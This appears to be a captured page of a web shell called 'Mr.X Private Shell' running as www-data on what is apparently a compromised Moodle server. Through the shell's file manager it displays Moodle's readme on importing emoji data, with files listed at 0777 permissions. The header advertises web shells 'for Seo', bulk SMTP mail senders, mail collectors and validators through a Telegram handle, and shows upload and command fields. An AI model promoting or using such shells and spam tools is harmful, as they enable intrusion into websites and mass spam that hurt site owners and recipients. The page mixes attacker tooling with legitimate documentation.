__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

www-data@216.73.216.10: ~ $
Description of emoji data import into Moodle.

1. Download the latest release of emoji data from https://github.com/iamcal/emoji-data/tags

2. Copy emoji_pretty.json into lib/emoji-data/

3. Run the generate_emoji_data.php script to create the new data.js file
   E.g. php lib/emoji-data/generate_emoji_data.php > lib/amd/src/emoji/data.js

   Once this command has been executed, open the newly created lib/amd/src/emoji/data.js file and make sure that the
   emoji data has been successfully generated.
   ==================================================================================================================
   NOTE: If the following error messages are displayed instead of the emoji data in data.js you should:
   * 'The following categories are missing: xyz, xyz, ...'
      1. add these categories in $categorysortorder in generate_emoji_data.php
      2. include these categories in the emoji picker template (lib/templates/emoji/picker.mustache).
      3. add appropriate icon mappings for these categories in get_core_icon_map() in
         lib/classes/output/icon_system_fontawesome.php.
      4. add language strings for these categories in lang/en/moodle.php.
   * 'The following categories are no longer used: xyz, xyz, ...'
      1. remove these categories from $categorysortorder in generate_emoji_data.php
      2. remove these categories from the emoji picker template (lib/templates/emoji/picker.mustache).
      3. remove the icon mappings for these categories in get_core_icon_map() in
         lib/classes/output/icon_system_fontawesome.php.
      4. remove (deprecate) the language strings for these categories in lang/en/moodle.php.

   Rerun 'php lib/emoji-data/generate_emoji_data.php > lib/amd/src/emoji/data.js'
   ==================================================================================================================

4. Build the new emoji data.js file
   E.g. grunt amd --files=lib/amd/src/emoji/data.js

5. Delete the emoji_pretty.json file from step 3

Filemanager

Name Type Size Permission Actions
data.js.mustache File 994 B 0777
generate_emoji_data.php File 4.76 KB 0777
readme_moodle.txt File 1.96 KB 0777
Filemanager